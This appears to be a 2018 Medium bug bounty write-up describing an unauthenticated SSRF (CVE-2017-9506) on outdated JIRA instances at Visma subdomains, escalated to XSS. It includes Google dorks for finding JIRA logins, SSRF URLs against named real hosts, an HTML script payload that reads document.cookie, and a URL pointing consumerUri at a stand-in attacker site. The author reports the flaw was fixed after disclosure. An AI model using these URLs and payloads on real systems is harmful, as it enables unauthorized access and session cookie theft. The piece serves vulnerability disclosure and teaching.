How Outdated JIRA Instances suffers from multiple security vulnerabilities?

Yeasir Arafat
Nov 3, 2018 · 2 min read

Hello friends. This is Yeasir Arafat again here. In this article, I want to share what can we do with if a site is running third-party integration like jira.

I was testing a public bug bounty program called visma. As usual, I do the recon process to collect some subdomain of its. Few of its subdomains caught my attention which was running jira services. Example,

  1. https://jira.visma.lv/secure/Dashboard.jspa
  2. https://customer-incident.consulting.visma.com/secure/Dashboard.jspa

If you are particularly looking for jira subdomains of your targets you can use this kinda dorks.

inurl:companyname intitle:JIRA logininurl:visma intitle:JIRA login
Image for post
Image for post
recon

I noticed that the domain https://jira.visma.lv has the JIRA version 6.2.7. I remember a CVE-2017–9506 for the Jira versions < 7.3.5. From the later version of jira, we can perform an Unauthenticated SSRF (CVE-2017–9506).

https://site.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.comhttps://site/confluence/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.com

Loading external site as an Unauthenticated SSRF on https://jira.visma.lv.

  1. https://jira.visma.lv/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
Image for post
Image for post
Unauthenticated SSRF

I have tried to extract some data to the internal assets or getting read access but I am unable to do that. For the exploitation, you can use a tools name `Jira-Scan` available in Github.

You can create a simple HTML file which means to add XSS script. By running the file onto the consumerUri=http://yoursite.com/xsshostedfile you can trigger the XSS.

<html><head><title>SSRF to XSS on Jira Vulnerable Instances</title></head><body>
<script>
alert( document.domain + " is vulnerable" );
alert( document.cookie);
</script></body></html>

Turning into XSS by adding an HTML file. It also increases the severity of the vulnerability.

2. https://jira.visma.lv/plugins/servlet/oauth/users/icon-uri?consumerUri=http://attackersite.com/ssrf.html

Image for post
Image for post
SSRF to XSS

I know that only loading external site is p4 severity bugs. Hopefully, I am able to turn this SSRF into XSS. The attacker can now steal the victim cookies.

p4

After sending a clean report about this vulnerability to the visma they fixed the issue between few hours. They told me that they will decommission other sub-domains which suffer from this same vulnerability.

Thanks!- Yeasir Arafat

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store